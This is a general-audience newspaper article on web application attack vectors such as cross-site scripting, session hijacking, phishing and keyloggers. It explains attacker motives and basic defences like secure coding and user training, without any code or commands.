Zimpapers Logo

The world of IT security has witnessed many attack vectors to information systems. In the previous article we focused on vulnerabilities, today let us have introspection on attack vectors in information security particularly on web applications. An attack vector is a path or a means by which a threat inflicts malicious damage to information systems. Some malicious payloads such as viruses or worms function as their own attack vector.

Hackers can exploit loopholes in security systems through an attack vector. Interestingly, in the modern digital world, hackers are now able to exploit even the human element to gain access to information and related Information Communication Infrastructure (ICT).

In day to day business, targeted items range from anything attractive to threat actors such as your personal computer, online/mobile banking account, tablets, or even yourself, as criminals aim to harvest or steal your credentials.

Vector/threat actors (people employing the attack vectors) have different motivations for inflicting such malicious damage.

These motivations may include financial and competitive gains, bragging rights or cyber terroristic intentions and revenge missions.

In web applications, attack vectors can to lead business loss or the ruin companies’ reputations as the website nowadays represents an image of a company. Individuals are not spared either, as they frequently surf through the web or perform financial transactions.

Attack vectors on web applications mainly exploit the weaknesses that exist in input validation.

It is very difficult for developers to perfectly cover all aspects of input validation which leads to a risk of cross-site scripting.

The most prevalent cross-site scripting attack vector targeted towards ordinary users is hijacking the individual’s online account while surfing the internet. This can be exploited through the stealing of session cookies.

Sensitive data such as online bank details can be stolen, and at times some reach the extent of illegitimately siphoning funds from the victim’s online account without his/her knowledge.

Some web applications may try to implement some counter measures by providing anti-cross site forgery tokens. An attack vector may instead then employ different techniques to gain access.

Human element could also be an attack vector as well through social engineering. Individuals manning corporate infrastructure need adequate and continuous training to make them aware of current trends in social engineering.

Awareness is the first point of buttressing security as the person would not be hoodwinked into disclosing sensitive information such as passwords. Since the human mind is the weakest link in the security chain, it is important for companies to educate its users not to surf or click into untrusted websites or unsolicited e-mail links.

To the corporates world or simple company websites which hold marketing information, the loopholes in the web facilitate a path for the threat actor to gain control of client computers connecting to the website.

The visual appearance of company websites can also be changed through cross site scripting.

To mitigate from these cross site scripting attack vectors, it is necessary for companies to ensure that secure programming techniques or deployment practices are applied to their web applications.

The user sessions can be secured by use of tones which will act as a unique identifier. Organisations that invest in IT security training are less susceptible to attacks than those that ignore user training.

It is imperative for the companies to understand that most attack vectors stem from human error.

An example is phishing, where an attack actor exploits the human element to compromise a computer system. It could be perceived that phishing is a result of weaknesses in network security.

This is not the case as the whole issue is viable when targeting users. It is also wise to encourage users to log out all web applications before leaving out the browser. Users should also be discouraged to use the same browser to perform financial transactions and as well as surfing internet for fun.

Web applications sometimes present portals that can easily give away credentials though shoulder surfing, a technique of standing behind and observing while someone enters their credentials. Individual should be wary of this occurrence.

Password harvesting can also occur by employment of key-logger software by more sophisticated criminals who later use the harvested passwords to inflict untold damage to non-suspecting victims.

On the whole, attack vectors are mainly exploited by some people for purely selfish reasons, for example bragging rights or cyber terroristic intentions, monetary gain and revenge missions by former employees. Some are just curious children who bump into information unintentionally but others are bent on intentionally damaging organisational resources. Disgruntled employees may want to sabotage resources in order to seek revenge while cyber terrorists want to further ideological fundamentalism. The gravity of the attack depends upon the motivation of the attacker. It is therefore imperative that we protect our web applications in order to align with current global trends so as to stay current with global trends and stay “secure”.